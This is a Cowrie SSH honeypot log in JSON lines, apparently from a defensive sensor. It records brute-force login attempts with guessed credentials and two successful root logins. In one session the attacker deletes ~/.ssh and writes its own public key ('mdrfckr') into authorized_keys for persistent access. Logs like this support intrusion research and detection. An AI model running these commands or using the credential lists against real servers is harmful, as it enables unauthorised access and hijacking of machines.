{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:04:12.105037Z","src_ip":"212.227.235.229","session":"c8c9c82f5097"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:04:12.188050Z","src_ip":"212.227.235.229","session":"315a7d6e8601"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34418,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ea85fa88256","protocol":"ssh","message":"New connection: 212.227.235.229:34418 (1.2.3.4:22) [session: 4ea85fa88256]","sensor":"my-vps","timestamp":"2025-08-31T06:04:14.390414Z"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":56064,"dst_ip":"1.2.3.4","dst_port":22,"session":"333b3370c497","protocol":"ssh","message":"New connection: 43.159.36.188:56064 (1.2.3.4:22) [session: 333b3370c497]","sensor":"my-vps","timestamp":"2025-08-31T06:04:16.416081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:04:16.417036Z","src_ip":"43.159.36.188","session":"333b3370c497"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:04:16.665723Z","src_ip":"43.159.36.188","session":"333b3370c497"}
{"eventid":"cowrie.login.failed","username":"test3","password":"P@ssw0rd123","message":"login attempt [test3/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:04:17.699553Z","src_ip":"212.227.235.229","session":"c8c9c82f5097"}
{"eventid":"cowrie.login.failed","username":"prowlarr","password":"123","message":"login attempt [prowlarr/123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:04:17.701533Z","src_ip":"43.159.36.188","session":"333b3370c497"}
{"eventid":"cowrie.login.failed","username":"1","password":"123456","message":"login attempt [1/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:04:17.893909Z","src_ip":"212.227.235.229","session":"315a7d6e8601"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:04:18.952360Z","src_ip":"43.159.36.188","session":"333b3370c497"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:04:19.085779Z","src_ip":"212.227.235.229","session":"315a7d6e8601"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:04:19.432052Z","src_ip":"212.227.235.229","session":"c8c9c82f5097"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:04:28.183697Z","src_ip":"212.227.235.229","session":"4ea85fa88256"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:04:28.184864Z","src_ip":"212.227.235.229","session":"4ea85fa88256"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46724,"dst_ip":"1.2.3.4","dst_port":22,"session":"66b77c8aafda","protocol":"ssh","message":"New connection: 212.227.125.160:46724 (1.2.3.4:22) [session: 66b77c8aafda]","sensor":"my-vps","timestamp":"2025-08-31T06:04:32.231437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:04:32.919912Z","src_ip":"212.227.125.160","session":"66b77c8aafda"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:04:32.942203Z","src_ip":"212.227.125.160","session":"66b77c8aafda"}
{"eventid":"cowrie.login.failed","username":"test3","password":"P@ssw0rd123","message":"login attempt [test3/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:04:35.434149Z","src_ip":"212.227.125.160","session":"66b77c8aafda"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:04:36.859114Z","src_ip":"212.227.125.160","session":"66b77c8aafda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55986,"dst_ip":"1.2.3.4","dst_port":22,"session":"c48e66ba37ed","protocol":"ssh","message":"New connection: 212.227.235.229:55986 (1.2.3.4:22) [session: c48e66ba37ed]","sensor":"my-vps","timestamp":"2025-08-31T06:04:44.192481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:04:44.193532Z","src_ip":"212.227.235.229","session":"c48e66ba37ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:04:44.479576Z","src_ip":"212.227.235.229","session":"c48e66ba37ed"}
{"eventid":"cowrie.login.failed","username":"flavia","password":"1234","message":"login attempt [flavia/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T06:04:45.663835Z","src_ip":"212.227.235.229","session":"c48e66ba37ed"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:04:46.951641Z","src_ip":"212.227.235.229","session":"c48e66ba37ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:04:54.575618Z","src_ip":"176.65.148.193","session":"b4e3a4cf1804"}
{"eventid":"cowrie.session.closed","duration":180.07032537460327,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:04:54.579172Z","src_ip":"176.65.148.193","session":"b4e3a4cf1804"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59516,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a75d08735e1","protocol":"ssh","message":"New connection: 212.227.235.229:59516 (1.2.3.4:22) [session: 6a75d08735e1]","sensor":"my-vps","timestamp":"2025-08-31T06:04:55.554813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:04:55.556075Z","src_ip":"212.227.235.229","session":"6a75d08735e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:04:55.837247Z","src_ip":"212.227.235.229","session":"6a75d08735e1"}
{"eventid":"cowrie.login.success","username":"root","password":"aa11223344","message":"login attempt [root/aa11223344] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:04:56.964544Z","src_ip":"212.227.235.229","session":"6a75d08735e1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:04:57.553013Z","src_ip":"212.227.235.229","session":"6a75d08735e1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:04:57.553831Z","src_ip":"212.227.235.229","session":"6a75d08735e1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:04:57.555133Z","src_ip":"212.227.235.229","session":"6a75d08735e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35352,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f732ca0137a","protocol":"ssh","message":"New connection: 212.227.125.160:35352 (1.2.3.4:22) [session: 2f732ca0137a]","sensor":"my-vps","timestamp":"2025-08-31T06:04:57.716999Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:04:57.838275Z","src_ip":"212.227.235.229","session":"6a75d08735e1"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123456","message":"login attempt [dev/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:04:58.405918Z","src_ip":"212.227.235.229","session":"4ea85fa88256"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:04:58.463699Z","src_ip":"212.227.235.229","session":"6a75d08735e1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:04:58.464604Z","src_ip":"212.227.235.229","session":"6a75d08735e1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:04:58.748294Z","src_ip":"212.227.235.229","session":"6a75d08735e1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:04:58.749253Z","src_ip":"212.227.235.229","session":"6a75d08735e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42374,"dst_ip":"1.2.3.4","dst_port":22,"session":"1437101839e7","protocol":"ssh","message":"New connection: 212.227.235.229:42374 (1.2.3.4:22) [session: 1437101839e7]","sensor":"my-vps","timestamp":"2025-08-31T06:04:59.015049Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:04:59.015946Z","src_ip":"212.227.235.229","session":"1437101839e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:04:59.284632Z","src_ip":"212.227.235.229","session":"1437101839e7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:05:00.400987Z","src_ip":"212.227.235.229","session":"1437101839e7"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:05:01.674285Z","src_ip":"212.227.235.229","session":"1437101839e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42382,"dst_ip":"1.2.3.4","dst_port":22,"session":"9de12134aa85","protocol":"ssh","message":"New connection: 212.227.235.229:42382 (1.2.3.4:22) [session: 9de12134aa85]","sensor":"my-vps","timestamp":"2025-08-31T06:05:01.950157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:05:01.951133Z","src_ip":"212.227.235.229","session":"9de12134aa85"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:05:02.228670Z","src_ip":"212.227.235.229","session":"9de12134aa85"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:05:03.381006Z","src_ip":"212.227.235.229","session":"9de12134aa85"}
